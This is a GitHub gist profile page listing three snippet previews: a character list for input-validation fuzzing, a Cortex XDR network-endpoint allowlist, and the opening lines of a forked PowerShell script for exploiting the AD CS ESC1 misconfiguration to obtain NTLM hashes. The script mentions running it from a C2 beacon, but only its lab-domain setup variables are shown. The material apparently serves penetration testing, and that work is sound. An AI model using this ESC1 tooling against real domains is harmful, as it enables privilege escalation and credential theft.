Skip to content

Instantly share code, notes, and snippets.

View Yeeb1's full-sized avatar
๐Ÿ’€
:feelsgood:

Yeeb Yeeb1

๐Ÿ’€
:feelsgood:
View GitHub Profile
@Yeeb1
Yeeb1 / fuzz_characters.txt
Created March 19, 2024 08:30
List of different characters to fuzz for input validation errors.
\n
\r
\t
\0
!
@
#
$
%
^
@Yeeb1
Yeeb1 / cortex.txt
Last active June 13, 2025 14:39
XDR Network Requirements
||*.xdr.*.paloaltonetworks.com^
||*.traps.paloaltonetworks.com^
||distributions.traps.paloaltonetworks.com^
||*.paloaltonetworks.com^
||panw-xdr-installers-prod-us.storage.googleapis.com^
||panw-xdr-payloads-prod-us.storage.googleapis.com^
||global-content-profiles-policy.storage.googleapis.com^
||panw-xdr-evr-prod-*.storage.googleapis.com^
||panw-xdr-installers-prod-fr.storage.googleapis.com^
||panw-xdr-payloads-prod-fr.storage.googleapis.com^
@Yeeb1
Yeeb1 / esc1.ps1
Created September 11, 2024 19:50 — forked from b4cktr4ck2/esc1.ps1
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
#Thank you @NotMedic for troubleshooting/validating stuff!
$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
$CA = $CAFQDN + "\" + $CASERVER